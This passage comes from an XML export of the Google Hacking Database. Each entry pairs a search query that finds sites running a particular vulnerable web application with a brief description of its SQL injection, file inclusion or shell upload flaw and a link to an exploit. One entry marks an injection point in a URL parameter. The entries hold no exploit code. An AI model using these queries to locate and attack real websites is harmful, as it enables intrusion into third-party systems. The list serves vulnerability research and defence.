<textualDescription>date :Jan 30 2005 this search reveal the src/webmail.php which would allow acrafted URL to include a remote web page. This was assigned CAN-2005-0103by the Common Vulnerabilities and Exposures.-what can possibly be done :*A possible cross site scripting issue exists in src/webmail.php that isonly accessible when the PHP installation is running with register_globalsset to On.*A possible local file inclusion issue was uncovered by one of ourdevelopers involving custom preference handlers. This issue is onlyactive if the PHP installation is running with register_globals set to On.</textualDescription>
<query>&quot;SquirrelMail version 1.4.4&quot; inurl:src ext:php</query>
<querystring>https://www.google.com/search?q=%22SquirrelMail+version+1.4.4%22+inurl%3Asrc+ext%3Aphp</querystring>
<edb></edb>
<date>2005-01-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1668</id>
<link>https://www.exploit-db.com/ghdb/1668</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Starting bid&quot; &quot;Powered by SoftbizScripts&quot;</shortDescription>
<textualDescription>Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln - CVE: 2007-5999: https://www.exploit-db.com/exploits/4617</textualDescription>
<query>&quot;Starting bid&quot; &quot;Powered by SoftbizScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22Starting+bid%22+%22Powered+by+SoftbizScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/4617</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3103</id>
<link>https://www.exploit-db.com/ghdb/3103</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Tanyakan Pada Rumput Yang Bergoyang&quot; </shortDescription>
<textualDescription>Autonomous LAN party 0.98.3 Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/9460</textualDescription>
<query>&quot;Tanyakan Pada Rumput Yang Bergoyang&quot;</query>
<querystring>https://www.google.com/search?q=%22Tanyakan+Pada+Rumput+Yang+Bergoyang%22</querystring>
<edb>https://www.exploit-db.com/exploits/9460</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2807</id>
<link>https://www.exploit-db.com/ghdb/2807</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Tanyakan Pada Rumput Yang Bergoyang&quot; </shortDescription>
<textualDescription>Moa Gallery 1.2.0 Multiple Remote File Inclusion Vulnerabilities - CVE: 2009-4614: https://www.exploit-db.com/exploits/9522</textualDescription>
<query>&quot;Tanyakan Pada Rumput Yang Bergoyang&quot;</query>
<querystring>https://www.google.com/search?q=%22Tanyakan+Pada+Rumput+Yang+Bergoyang%22</querystring>
<edb>https://www.exploit-db.com/exploits/9522</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1283</id>
<link>https://www.exploit-db.com/ghdb/1283</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Thank You for using WPCeasy&quot;</shortDescription>
<textualDescription>There is a SQL injection vulnerability in WPC.easy, resulting in full admin access to any remote attacker. Vendor was notified. http://www.securityfocus.com/archive/1/425395</textualDescription>
<query>&quot;Thank You for using WPCeasy&quot;</query>
<querystring>https://www.google.com/search?q=%22Thank+You+for+using+WPCeasy%22&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>3334</id>
<link>https://www.exploit-db.com/ghdb/3334</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;The Merchant Project&quot;</shortDescription>
<textualDescription>The Merchant</textualDescription>
<query>&quot;The Merchant Project&quot;</query>
<querystring>https://www.google.com/search?q=%22The+Merchant+Project%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2877</id>
<link>https://www.exploit-db.com/ghdb/2877</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;These forums are running on&quot; &quot;miniBB&quot;</shortDescription>
<textualDescription>miniBB 2.1 (table) Remote SQL Injection Vulnerability - CVE: 2007-5719: https://www.exploit-db.com/exploits/4587</textualDescription>
<query>&quot;These forums are running on&quot; &quot;miniBB&quot;</query>
<querystring>https://www.google.com/search?q=%22These+forums+are+running+on%22+%22miniBB%22</querystring>
<edb>https://www.exploit-db.com/exploits/4587</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3499</id>
<link>https://www.exploit-db.com/ghdb/3499</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This forum powered by Phorum.&quot;</shortDescription>
<textualDescription>Phorum 5 (pm.php) Arbitrary Local Inclusion - CVE: 2006-3611: https://www.exploit-db.com/exploits/2008</textualDescription>
<query>&quot;This forum powered by Phorum.&quot;</query>
<querystring>https://www.google.com/search?q=%22This+forum+powered+by+Phorum.%22</querystring>
<edb>https://www.exploit-db.com/exploits/2008</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3584</id>
<link>https://www.exploit-db.com/ghdb/3584</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This is a Free &amp; Open Source mailing list manager&quot;</shortDescription>
<textualDescription>Open Newsletter</textualDescription>
<query>&quot;This is a Free &amp; Open Source mailing list manager&quot;</query>
<querystring>https://www.google.com/search?q=%22This+is+a+Free+%26+Open+Source+mailing+list+manager%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>577</id>
<link>https://www.exploit-db.com/ghdb/577</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This page has been automatically generated by Plesk Server Administrator&quot;</shortDescription>
<textualDescription>Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP. Due to an input validation error in Plesk Server Administrator, it is possible for a remote attacker to make a specially crafted web request which will display PHP source code. This is acheivable by connecting to a host (using the IP address rather than the domain name), and submitting a request for a known PHP file along with a valid username. http://www.securityfocus.com/bid/3737</textualDescription>
<query>&quot;This page has been automatically generated by Plesk Server Administrator&quot;</query>
<querystring>https://www.google.com/search?q=%22This+page+has+been+automatically+generated+by+Plesk+Server+Administrator%22&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1537</id>
<link>https://www.exploit-db.com/ghdb/1537</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This script created by www.script.canavari.com&quot;</shortDescription>
<textualDescription>Basic Forum 1.1 (edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6193: https://www.exploit-db.com/exploits/2848</textualDescription>
<query>&quot;This script created by www.script.canavari.com&quot;</query>
<querystring>https://www.google.com/search?q=%22This+script+created+by+www.script.canavari.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/2848</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1345</id>
<link>https://www.exploit-db.com/ghdb/1345</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This script was created by Php-ZeroNet&quot; &quot;Script . Php-ZeroNet&quot;</shortDescription>
<textualDescription>Php-ZeroNet is a script comprised of php allowing webmasters to start a online community. Php-ZeroNet features Content Management, News posting, User CP, interactive sytem, etc. Php-ZeroNet uses a wide range of different cases in its script, it can adaptmy exploit:http://fr0zen.no-ip.org/phpnetzero-1.2.1_xpl.phps</textualDescription>
<query>&quot;This script was created by Php-ZeroNet&quot; &quot;Script . Php-ZeroNet&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22This+script+was+created+by+Php-ZeroNet%22+%22Script+.+Php-ZeroNet%22+</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>2271</id>
<link>https://www.exploit-db.com/ghdb/2271</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This site is powered by CMS Made Simple version 1.&quot;</shortDescription>
<textualDescription>CMS Made Simple 1.6.2 Local File Disclosure Vulnerability: https://www.exploit-db.com/exploits/9407</textualDescription>
<query>&quot;This site is powered by CMS Made Simple version 1.&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22This+site+is+powered+by+CMS+Made+Simple+version+1.%22</querystring>
<edb>https://www.exploit-db.com/exploits/9407</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2903</id>
<link>https://www.exploit-db.com/ghdb/2903</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This site is powered by CMS Made Simple version 1.2.2&quot;</shortDescription>
<textualDescription>CMS Made Simple 1.2.2 (TinyMCE module) SQL Injection Vuln - CVE: 2007-6656: https://www.exploit-db.com/exploits/4810</textualDescription>
<query>&quot;This site is powered by CMS Made Simple version 1.2.2&quot;</query>
<querystring>https://www.google.com/search?q=%22This+site+is+powered+by+CMS+Made+Simple+version+1.2.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/4810</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3493</id>
<link>https://www.exploit-db.com/ghdb/3493</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This site is powered by CMS Made Simple&quot;</shortDescription>
<textualDescription>CMS Made Simple 1.2.4 (FileManager module) File Upload - CVE: 2008-2267: https://www.exploit-db.com/exploits/5600</textualDescription>
<query>&quot;This site is powered by CMS Made Simple&quot;</query>
<querystring>https://www.google.com/search?q=%22This+site+is+powered+by+CMS+Made+Simple%22</querystring>
<edb>https://www.exploit-db.com/exploits/5600</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3581</id>
<link>https://www.exploit-db.com/ghdb/3581</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This site is powered by e107&quot;</shortDescription>
<textualDescription>TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution - CVE: 2006-4602:
https://www.exploit-db.com/exploits/2711</textualDescription>
<query>&quot;This site is powered by e107&quot;</query>
<querystring>https://www.google.com/search?q=%22This+site+is+powered+by+e107%22</querystring>
<edb>https://www.exploit-db.com/exploits/2711</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3526</id>
<link>https://www.exploit-db.com/ghdb/3526</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This site is powered by e107&quot;|inurl:e107_plugins|e107_handlers|e107_files</shortDescription>
<textualDescription>e107 0.75 (GLOBALS Overwrite) Remote Code Execution: https://www.exploit-db.com/exploits/2268</textualDescription>
<query>&quot;This site is powered by e107&quot;|inurl:e107_plugins|e107_handlers|e107_files</query>
<querystring>https://www.google.com/search?q=%22This+site+is+powered+by+e107%22|inurl:e107_plugins|e107_handlers|e107_files</querystring>
<edb>https://www.exploit-db.com/exploits/2268</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3594</id>
<link>https://www.exploit-db.com/ghdb/3594</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;this site is using the webspell script (version: 4.01.02)&quot;</shortDescription>
<textualDescription>CVE: 2007-0502
EDB-ID: 3172
This search can potentially identify vulnerable installations of webSPELL 4.01.02</textualDescription>
<query>&quot;this site is using the webspell script (version: 4.01.02)&quot;</query>
<querystring>https://www.google.com/search?q=%22this+site+is+using+the+webspell+script+%28version%3A+4.01.02%29%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3589</id>
<link>https://www.exploit-db.com/ghdb/3589</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This web site was made with MD-Pro&quot;</shortDescription>
<textualDescription>CVE: 2006-7112
EDB-ID: 2712
This search can potentially identify vulnerable installations of MD-Pro, a web portal system written in PHP.</textualDescription>
<query>&quot;This web site was made with MD-Pro&quot;</query>
<querystring>https://www.google.com/search?q=&quot;This web site was made with MD-Pro&quot;</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3543</id>
<link>https://www.exploit-db.com/ghdb/3543</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This web site was made with PostNuke&quot;</shortDescription>
<textualDescription>PostNuke 0.763 (PNSV lang) Remote Code Execution - CVE: 2006-5733: https://www.exploit-db.com/exploits/2707</textualDescription>
<query>&quot;This web site was made with PostNuke&quot;</query>
<querystring>https://www.google.com/search?q=%22This+web+site+was+made+with+PostNuke%22</querystring>
<edb>https://www.exploit-db.com/exploits/2707</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1298</id>
<link>https://www.exploit-db.com/ghdb/1298</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This website engine code is copyright&quot; &quot;2005 by Clever Copy&quot; -inurl:demo</shortDescription>
<textualDescription>Clever Copy</textualDescription>
<query>&quot;This website engine code is copyright&quot; &quot;2005 by Clever Copy&quot; -inurl:demo</query>
<querystring>https://www.google.com/search?q=%22This+website+engine+code+is+copyright%22+%222005+by+Clever+Copy%22+-inurl:demo&amp;hl=it&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>2330</id>
<link>https://www.exploit-db.com/ghdb/2330</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This website is powered by Mobius&quot;</shortDescription>
<textualDescription>Mobius 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3420: https://www.exploit-db.com/exploits/6138</textualDescription>
<query>&quot;This website is powered by Mobius&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22This+website+is+powered+by+Mobius%22</querystring>
<edb>https://www.exploit-db.com/exploits/6138</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2166</id>
<link>https://www.exploit-db.com/ghdb/2166</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This website is powered by Trio&quot;</shortDescription>
<textualDescription>TriO 2.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3418: https://www.exploit-db.com/exploits/6141</textualDescription>
<query>&quot;This website is powered by Trio&quot;</query>
<querystring>https://www.google.com/search?q=%22This+website+is+powered+by+Trio%22</querystring>
<edb>https://www.exploit-db.com/exploits/6141</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1213</id>
<link>https://www.exploit-db.com/ghdb/1213</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This website powered by PHPX&quot; -demo</shortDescription>
<textualDescription>this is the dork for PhpX</textualDescription>
<query>&quot;This website powered by PHPX&quot; -demo</query>
<querystring>https://www.google.com/search?q=%22This+website+powered+by+PHPX%22+-demo</querystring>
<edb></edb>
<date>2005-11-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1199</id>
<link>https://www.exploit-db.com/ghdb/1199</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This website was created with phpWebThings 1.4&quot;</shortDescription>
<textualDescription>This is Secunia advisory:http://secunia.com/advisories/17410/and my exploit that show a new vulnerability in &quot;msg&quot; parameter:http://rgod.altervista.org/phpwebth14_xpl.html</textualDescription>
<query>&quot;This website was created with phpWebThings 1.4&quot;</query>
<querystring>https://www.google.com/search?q=%22This+website+was+created+with+phpWebThings+1.4%22</querystring>
<edb></edb>
<date>2005-11-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>2511</id>
<link>https://www.exploit-db.com/ghdb/2511</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;This website was created with phpWebThings&quot;</shortDescription>
<textualDescription>phpWebThings 1.5.2 (editor.php) Remote File Include Vulnerability - CVE: 2006-6042: https://www.exploit-db.com/exploits/2811</textualDescription>
<query>&quot;This website was created with phpWebThings&quot;</query>
<querystring>https://www.google.com/search?q=%22This+website+was+created+with+phpWebThings%22</querystring>
<edb>https://www.exploit-db.com/exploits/2811</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3671</id>
<link>https://www.exploit-db.com/ghdb/3671</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;TinyBB 2011 all rights reserved&quot;</shortDescription>
<textualDescription>Submitter: Aodrulez SQL Injection: https://www.exploit-db.com/exploits/15961/</textualDescription>
<query>&quot;TinyBB 2011 all rights reserved&quot;</query>
<querystring>https://www.google.com/search?q=%22TinyBB%202011%20all%20rights%20reserved%22</querystring>
<edb>https://www.exploit-db.com/exploits/15961</edb>
<date>2011-01-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3437</id>
<link>https://www.exploit-db.com/ghdb/3437</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;toendaCMS is Free Software released under the GNU/GPL License.&quot; | &quot;powered by toendaCMS&quot; -inurl:demo</shortDescription>
<textualDescription>toendaCMS 1.0.0 (FCKeditor) Remote File Upload: https://www.exploit-db.com/exploits/2035</textualDescription>
<query>&quot;toendaCMS is Free Software released under the GNU/GPL License.&quot; | &quot;powered by toendaCMS&quot; -inurl:demo</query>
<querystring>https://www.google.com/search?q=%22toendaCMS+is+Free+Software+released+under+the+GNU/GPL+License.%22+|+%22powered+by+toendaCMS%22+-inurl:demo</querystring>
<edb>https://www.exploit-db.com/exploits/2035</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1903</id>
<link>https://www.exploit-db.com/ghdb/1903</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Torbstoff News 4&quot;</shortDescription>
<textualDescription>Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability - CVE: 2006-4045: https://www.exploit-db.com/exploits/2121</textualDescription>
<query>&quot;Torbstoff News 4&quot;</query>
<querystring>https://www.google.com/search?q=%22Torbstoff+News+4%22</querystring>
<edb>https://www.exploit-db.com/exploits/2121</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1927</id>
<link>https://www.exploit-db.com/ghdb/1927</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;TR Newsportal&quot; brought by TRanx.</shortDescription>
<textualDescription>TR Newsportal 0.36tr1 (poll.php) Remote File Inclusion Vulnerability - CVE: 2006-2557: https://www.exploit-db.com/exploits/1789</textualDescription>
<query>&quot;TR Newsportal&quot; brought by TRanx.</query>
<querystring>https://www.google.com/search?q=%22TR+Newsportal%22+brought+by+TRanx.</querystring>
<edb>https://www.exploit-db.com/exploits/1789</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1985</id>
<link>https://www.exploit-db.com/ghdb/1985</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Transloader by Somik.org&quot; OR &quot;Transloader by&quot; OR &quot;Transloder&quot;</shortDescription>
<textualDescription>Transload Script Upload Vulnerability: https://www.exploit-db.com/exploits/11155</textualDescription>
<query>&quot;Transloader by Somik.org&quot; OR &quot;Transloader by&quot; OR &quot;Transloder&quot;</query>
<querystring>https://www.google.com/search?q=%22Transloader+by+Somik.org%22+OR+%22Transloader+by%22+OR+%22Transloder%22</querystring>
<edb>https://www.exploit-db.com/exploits/11155</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1738</id>
<link>https://www.exploit-db.com/ghdb/1738</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;TROforum 0.1&quot;</shortDescription>
<textualDescription>TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability - CVE: 2007-2937: https://www.exploit-db.com/exploits/3995</textualDescription>
<query>&quot;TROforum 0.1&quot;</query>
<querystring>https://www.google.com/search?q=%22TROforum+0.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/3995</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2266</id>
<link>https://www.exploit-db.com/ghdb/2266</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;txx cms&quot;</shortDescription>
<textualDescription>Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4819: https://www.exploit-db.com/exploits/4381</textualDescription>
<query>&quot;txx cms&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22txx+cms%22</querystring>
<edb>https://www.exploit-db.com/exploits/4381</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1775</id>
<link>https://www.exploit-db.com/ghdb/1775</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Upload unique IP List:&quot; AND &quot;The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK&quot;</shortDescription>
<textualDescription>Fake Hit Generator 2.2 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/10230</textualDescription>
<query>&quot;Upload unique IP List:&quot; AND &quot;The Ultimate Fake Hit Generator - BOOST YOUR ALEXA RANK&quot;</query>
<querystring>https://www.google.com/search?q=%22Upload+unique+IP+List:%22+AND+%22The+Ultimate+Fake+Hit+Generator+-+BOOST+YOUR+ALEXA+RANK%22</querystring>
<edb>https://www.exploit-db.com/exploits/10230</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1739</id>
<link>https://www.exploit-db.com/ghdb/1739</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Uploader by CeleronDude.&quot;</shortDescription>
<textualDescription>Uploader by CeleronDude 5.3.0 Shell Upload: https://www.exploit-db.com/exploits/10523</textualDescription>
<query>&quot;Uploader by CeleronDude.&quot;</query>
<querystring>https://www.google.com/search?q=%22Uploader+by+CeleronDude.%22</querystring>
<edb>https://www.exploit-db.com/exploits/10523</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2142</id>
<link>https://www.exploit-db.com/ghdb/2142</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Uploader by CeleronDude.&quot;</shortDescription>
<textualDescription>Uploader by CeleronDude 5.3.0 - Upload Vulnerability: https://www.exploit-db.com/exploits/11166</textualDescription>
<query>&quot;Uploader by CeleronDude.&quot;</query>
<querystring>https://www.google.com/search?q=%22Uploader+by+CeleronDude.%22</querystring>
<edb>https://www.exploit-db.com/exploits/11166</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2332</id>
<link>https://www.exploit-db.com/ghdb/2332</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;visiteurs v2.0&quot;</shortDescription>
<textualDescription>Les Visiteurs (Visitors) 2.0 (config.inc.php) File Include Vulnerability: https://www.exploit-db.com/exploits/2449</textualDescription>
<query>&quot;visiteurs v2.0&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22visiteurs+v2.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/2449</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2705</id>
<link>https://www.exploit-db.com/ghdb/2705</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Vivid Ads Shopping Cart&quot;</shortDescription>
<textualDescription>Vivid Ads Shopping Cart (prodid) Remote SQL Injection: https://www.exploit-db.com/exploits/10297</textualDescription>
<query>&quot;Vivid Ads Shopping Cart&quot;</query>
<querystring>https://www.google.com/search?q=%22Vivid+Ads+Shopping+Cart%22</querystring>
<edb>https://www.exploit-db.com/exploits/10297</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1997</id>
<link>https://www.exploit-db.com/ghdb/1997</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Web Group Communication Center beta 0.5.6&quot; OR &quot;Web Group Communication Center beta 0.5.5&quot;</shortDescription>
<textualDescription>WGCC 0.5.6b (quiz.php) Remote SQL Injection Vulnerability - CVE: 2006-5514: https://www.exploit-db.com/exploits/2604</textualDescription>
<query>&quot;Web Group Communication Center beta 0.5.6&quot; OR &quot;Web Group Communication Center beta 0.5.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Web+Group+Communication+Center+beta+0.5.6%22+OR+%22Web+Group+Communication+Center+beta+0.5.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/2604</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3077</id>
<link>https://www.exploit-db.com/ghdb/3077</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Web Group Communication Center&quot;</shortDescription>
<textualDescription>Web Group Communication Center (WGCC) 1.0.3 SQL Injection Vuln - CVE: 2008-2445: https://www.exploit-db.com/exploits/5606</textualDescription>
<query>&quot;Web Group Communication Center&quot;</query>
<querystring>https://www.google.com/search?q=%22Web+Group+Communication+Center%22</querystring>
<edb>https://www.exploit-db.com/exploits/5606</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2468</id>
<link>https://www.exploit-db.com/ghdb/2468</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Web Site Design by Red Cat Studios&quot;</shortDescription>
<textualDescription>Realtor WebSite System E-Commerce idfestival SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12776</textualDescription>
<query>&quot;Web Site Design by Red Cat Studios&quot;</query>
<querystring>https://www.google.com/search?q=%22Web+Site+Design+by+Red+Cat+Studios%22</querystring>
<edb>https://www.exploit-db.com/exploits/12776</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3094</id>
<link>https://www.exploit-db.com/ghdb/3094</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Web Site Design by Red Cat Studios&quot;</shortDescription>
<textualDescription>Realtor WebSite System E-Commerce SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12772</textualDescription>
<query>&quot;Web Site Design by Red Cat Studios&quot;</query>
<querystring>https://www.google.com/search?q=%22Web+Site+Design+by+Red+Cat+Studios%22</querystring>
<edb>https://www.exploit-db.com/exploits/12772</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2046</id>
<link>https://www.exploit-db.com/ghdb/2046</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Web site engine's code is copyright © 2001-2007 ATutor®&quot;</shortDescription>
<textualDescription>ATutor 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability - CVE: 2008-3368: https://www.exploit-db.com/exploits/6153</textualDescription>
<query>&quot;Web site engine's code is copyright © 2001-2007 ATutor®&quot;</query>
<querystring>https://www.google.com/search?q=%22Web+site+engine's+code+is+copyright+%C3%82%C2%A9+2001-2007+ATutor%C3%82%C2%AE%22</querystring>
<edb>https://www.exploit-db.com/exploits/6153</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1550</id>
<link>https://www.exploit-db.com/ghdb/1550</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;WebCalendar v1.0.4&quot;</shortDescription>
<textualDescription>WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability - CVE: 2008-2836: https://www.exploit-db.com/exploits/5847</textualDescription>
<query>&quot;WebCalendar v1.0.4&quot;</query>
<querystring>https://www.google.com/search?q=%22WebCalendar+v1.0.4%22</querystring>
<edb>https://www.exploit-db.com/exploits/5847</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3059</id>
<link>https://www.exploit-db.com/ghdb/3059</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Webdesign Cosmos Solutions&quot;</shortDescription>
<textualDescription>Cosmos Solutions cms SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12793</textualDescription>
<query>&quot;Webdesign Cosmos Solutions&quot;</query>
<querystring>https://www.google.com/search?q=%22Webdesign+Cosmos+Solutions%22</querystring>
<edb>https://www.exploit-db.com/exploits/12793</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2581</id>
<link>https://www.exploit-db.com/ghdb/2581</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Webdesign Cosmos Solutions&quot;</shortDescription>
<textualDescription>Cosmos Solutions cms SQL Injection Vulnerability ( id= / page= ): https://www.exploit-db.com/exploits/12794</textualDescription>
<query>&quot;Webdesign Cosmos Solutions&quot;</query>
<querystring>https://www.google.com/search?q=%22Webdesign+Cosmos+Solutions%22</querystring>
<edb>https://www.exploit-db.com/exploits/12794</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2020</id>
<link>https://www.exploit-db.com/ghdb/2020</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Website by Spokane Web Communications&quot;</shortDescription>
<textualDescription>ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12526</textualDescription>
<query>&quot;Website by Spokane Web Communications&quot;</query>
<querystring>https://www.google.com/search?q=%22Website+by+Spokane+Web+Communications%22</querystring>
<edb>https://www.exploit-db.com/exploits/12526</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3236</id>
<link>https://www.exploit-db.com/ghdb/3236</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Website by WebSolutions.ca&quot;</shortDescription>
<textualDescription>WsCMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12813</textualDescription>
<query>&quot;Website by WebSolutions.ca&quot;</query>
<querystring>https://www.google.com/search?q=%22Website+by+WebSolutions.ca%22</querystring>
<edb>https://www.exploit-db.com/exploits/12813</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3658</id>
<link>https://www.exploit-db.com/ghdb/3658</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Website Design by Rocktime&quot;</shortDescription>
<textualDescription>Submitter: n0n0x http://server/product.php?fdProductId=[SQL Injection]</textualDescription>
<query>&quot;Website Design by Rocktime&quot;</query>
<querystring>https://www.google.com/search?q=%22Website%20Design%20by%20Rocktime%22</querystring>
<edb></edb>
